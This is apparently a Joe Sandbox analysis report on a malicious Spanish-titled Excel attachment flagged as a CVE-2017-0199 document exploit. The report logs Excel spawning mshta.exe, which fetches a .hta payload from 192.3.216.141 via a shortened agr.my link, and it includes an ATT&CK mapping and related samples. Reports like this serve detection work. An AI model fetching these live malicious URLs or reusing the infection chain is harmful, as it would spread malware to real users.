Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.141
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /KKhF4w?&insolence=nauseating&president HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /bestkissingdayswithgreatnicebeautygirlsareound.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.216.141
Source: global trafficDNS traffic detected: DNS query: agr.my
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Transferencia de pago.xla.xlsxString found in binary or memory: https://agr.my/KKhF4w?&insolence=nauseating&president
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: Transferencia de pago.xla.xlsxOLE indicator, VBA macros: true
Source: Transferencia de pago.xla.xlsxStream path 'MBD00BF1C46/\x1Ole' : https://agr.my/KKhF4w?&insolence=nauseating&president)_D_O?S,>$5J,7|1~$Jp&newxO^7rV2B-D?e_R~WS7'[)$i-l_m(|CcYh1GTOldn8pCmxzKHSojbR83N9QFoBKzMGSBuV5DSfb2ainx2bWph10l5ftV9GTkjyWj3kM5sPiW4TjXrnqzMxw8kXbaWiLq0z3wvdvkiQBMRTPs2cw0VR0XQwQPi7hSGSd/MV4#'FKo!Hm
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'transferencia de pago.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Transferencia de pago.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{06A26546-C258-4C67-BF75-4CD12F2A61FF} - OProcSessId.datJump to behavior
Source: Transferencia de pago.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Transferencia de pago.xla.xlsxReversingLabs: Detection: 38%
Source: Transferencia de pago.xla.xlsxVirustotal: Detection: 29%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Transferencia de pago.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Transferencia de pago.xla.xlsxStatic file information: File size 1263104 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Transferencia de pago.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Transferencia de pago.xla.xlsxStream path 'MBD00BF1C45/Package' entropy: 7.99512859404 (max. 8.0)
Source: Transferencia de pago.xla.xlsxStream path 'Workbook' entropy: 7.99483810742 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 931Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648781 Sample: Transferencia de pago.xla.xlsx Startdate: 26/03/2025 Architecture: WINDOWS Score: 56 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0012.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Document exploit detected (process start blacklist hit) 2->33 35 Sigma detected: Suspicious Microsoft Office Child Process 2->35 7 EXCEL.EXE 230 62 2->7         started        11 EXCEL.EXE 48 47 2->11         started        signatures3 process4 dnsIp5 25 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49700, 49701 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->25 27 agr.my 147.79.86.93, 443, 49697 EKSENBILISIMTR United States 7->27 29 192.3.216.141, 49698, 80 AS-COLOCROSSINGUS United States 7->29 17 C:\Users\...\~$Transferencia de pago.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Transferencia de pago.xla.xlsx39%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
Transferencia de pago.xla.xlsx29%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://agr.my/KKhF4w?&insolence=nauseating&president0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0012.t-0009.t-msedge.net
13.107.246.40
truefalse
    high
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      agr.my
      147.79.86.93
      truefalse
        unknown
        s-0005.dual-s-msedge.net
        52.123.129.14
        truefalse
          high
          otelrules.svc.static.microsoft
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://agr.my/KKhF4w?&insolence=nauseating&presidentfalse
            • Avira URL Cloud: safe
            unknown
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              high
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                high
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  147.79.86.93
                  agr.myUnited States
                  208485EKSENBILISIMTRfalse
                  192.3.216.141
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  13.107.246.40
                  s-part-0012.t-0009.t-msedge.netUnited States
                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1648781
                  Start date and time:2025-03-26 08:01:25 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Transferencia de pago.xla.xlsx
                  Detection:MAL
                  Classification:mal56.expl.winXLSX@6/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.8.89, 184.31.69.3, 52.109.16.112, 199.232.210.172, 51.105.71.137, 13.69.239.73, 52.123.129.14, 20.12.23.50, 40.126.35.151
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, cus-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, osiprod-ncus-buff-azsc-000.northcentralus.cloudapp.azure.com, ncus-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, onedscolprduks03.uksouth.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, onedscolprdneu03.northeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsvc1.live.com.akadn
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  03:03:31API Interceptor973x Sleep call for process: splwow64.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  192.3.216.141givingbestthingsalwaysfor.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                  • 192.3.216.141/mmmabiggg.txt
                  Nueva orden.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 192.3.216.141/givingbestthingsalwaysfor.hta
                  Nueva orden.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 192.3.216.141/givingbestthingsalwaysfor.hta
                  13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                  • www.aib.gov.uk/
                  NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zs
                  PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/42Q
                  06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zk
                  Quotation.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zM
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  s-0005.dual-s-msedge.netPayment Advice Note from 25.03.2025.msgGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  Filled-Summons Notice (2).docxGet hashmaliciousHTMLPhisherBrowse
                  • 52.123.128.14
                  Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  7e02499c-2bea-a9d9-6a2f-934633fb5e94.emlGet hashmaliciousUnknownBrowse
                  • 52.123.129.14
                  https://thetti-my.sharepoint.com/:f:/p/kellieblack/EtssBivICL5BgQEDfbETZP4BZsoHTOyxYMnSj46dgeiAiA?e=0t2fdmGet hashmaliciousHTMLPhisherBrowse
                  • 52.123.128.14
                  Revised - Hartzellprop.com 2025 Handbook29828.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                  • 52.123.128.14
                  Revised - Cwalker 2025 Handbook25807.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                  • 52.123.129.14
                  original.emlGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  PO 25032025.docxGet hashmaliciousUnknownBrowse
                  • 52.123.129.14
                  bg.microsoft.map.fastly.netLegal_Notice _Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 199.232.214.172
                  92.255.85.2.exeGet hashmaliciousXWormBrowse
                  • 199.232.210.172
                  92.255.85_1.2.ps1Get hashmaliciousXWormBrowse
                  • 199.232.214.172
                  cJa3vlUJIWlzkdg.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                  • 199.232.214.172
                  https://www.canva.com/design/DAGip6DbGGY/U0pN74ofNkqBSFMzXXCnAw/view?utm_content=DAGip6DbGGY&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h777bcb50d3Get hashmaliciousInvisible JS, Tycoon2FABrowse
                  • 199.232.214.172
                  file.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                  • 199.232.214.172
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 199.232.210.172
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 199.232.210.172
                  ggap4lbV49.exeGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  Fiyat teklifi hk.exeGet hashmaliciousVIP KeyloggerBrowse
                  • 199.232.210.172
